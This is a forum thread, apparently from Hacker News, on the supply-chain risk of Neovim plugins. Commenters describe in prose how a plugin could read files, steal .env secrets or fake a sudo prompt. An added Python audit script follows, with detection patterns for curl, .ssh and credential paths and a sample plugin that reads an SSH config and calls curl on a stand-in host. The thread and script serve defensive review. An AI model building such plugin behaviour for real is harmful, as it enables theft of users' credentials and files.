bikeshaving 5 days ago

I’m curious. What’s the risk of a supply chain attack? What are the privileges of a VIM plugin?

feinte 5 days ago | parent | next [-]

A plugin can spawn arbitrary processes, so if neovim is not started in a sandbox (container, namespace, firejail...) they can basically do whatever your user has the right to do.

Pretty big supply chain risks here.

WhyNotHugo 5 days ago | parent [-]

And oftentimes sandboxing it is hard.

E.g.: what do you use to edit ~/.ssh/config or ~/.profile?

asimovDev 5 days ago | parent | prev | next [-]

neovim (vim) plugins can make web requests, so you could steal secrets from a .env file being edited by, for example, making an LSP plugin active for .env files? According to my limited knowledge of LSP and how neovim plugins work, it should be possible.

Could also just phone home everything a user edits using the text editor I bet.

Can someone tell me, when someone has a terminal buffer, using a vim plugin, could you potentially steal their root password when a user runs a sudo command?

And following up, could you, using that password, allow SSH connections and open ports in other system config files? Disable firewall? And potentially execute other commands using `:!` ?

63stack 4 days ago | parent [-]

You have the entire Lua language available in vim plugins, so you can just read all the files on the disk that the user has access to; you don't need to make an LSP plugin.

Executing shell commands is also possible, yes. Reading the root password is not possible because that's handled by an external program (forgot the specifics on Linux), but you could technically present a fake password prompt, and steal that.
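A defender-side check in the spirit of the thread above: an added example (not code from the page or from any Neovim project) that scans plugin Lua sources for the calls that give a plugin process, network and file access, so a reviewer can see which installed plugins actually use the capabilities described. The API pattern list and the sample plugin source are constructed for illustration.

```python
"""Audit Neovim Lua plugin sources for capabilities a malicious plugin would need."""
import re
import sys
from pathlib import Path

# Lua / Neovim APIs grouped by the capability they give a plugin. A hit is not
# proof of malice (many legitimate plugins spawn processes); it is a review prompt.
CAPABILITIES = {
    "process": r"\bos\.execute\b|\bio\.popen\b|\bvim\.fn\.(?:system|systemlist|jobstart)\b"
               r"|\bvim\.(?:loop|uv)\.spawn\b|\bvim\.system\b",
    "network": r"\bvim\.(?:loop|uv)\.new_tcp\b|\bvim\.fn\.sockconnect\b|\b(?:curl|wget)\b",
    "file_read": r"\bio\.open\b|\bvim\.fn\.readfile\b|\bvim\.(?:loop|uv)\.fs_open\b",
    "sensitive_path": r"\.ssh\b|\.env\b|\.gnupg\b|\.aws\b|\.netrc\b|id_(?:rsa|ed25519)\b",
}
PATTERNS = {cap: re.compile(rx) for cap, rx in CAPABILITIES.items()}


def audit_source(source: str, name: str = "<inline>") -> list[tuple[str, int, str, str]]:
    """Return (file, line_no, capability, line) for every line matching a pattern."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        # Skip pure Lua comments so a README-style mention of curl is not flagged.
        if line.lstrip().startswith("--"):
            continue
        for cap, rx in PATTERNS.items():
            if rx.search(line):
                findings.append((name, line_no, cap, line.strip()))
    return findings


def audit_tree(root: Path) -> list[tuple[str, int, str, str]]:
    """Audit every .lua file under a plugin directory (e.g. the plugin manager's data dir)."""
    findings = []
    for path in sorted(root.rglob("*.lua")):
        findings.extend(audit_source(path.read_text(errors="replace"), str(path)))
    return findings


# Constructed sample: a plugin that opens an SSH dotfile and spawns a network client.
SUSPICIOUS_PLUGIN = """
local M = {}
function M.setup()
  local f = io.open(os.getenv("HOME") .. "/.ssh/config", "r")
  vim.fn.jobstart({ "curl", "https://example.invalid/collect" })
end
return M
"""

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    results = audit_tree(root) if root else audit_source(SUSPICIOUS_PLUGIN, "sample.lua")
    for name, line_no, cap, text in results:
        print(f"{name}:{line_no} [{cap}] {text}")
```

Run it with a plugin directory as the first argument to audit installed plugins; with no argument it audits the embedded sample.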

kzrdude 5 days ago | parent | prev [-]

Anything a user application can do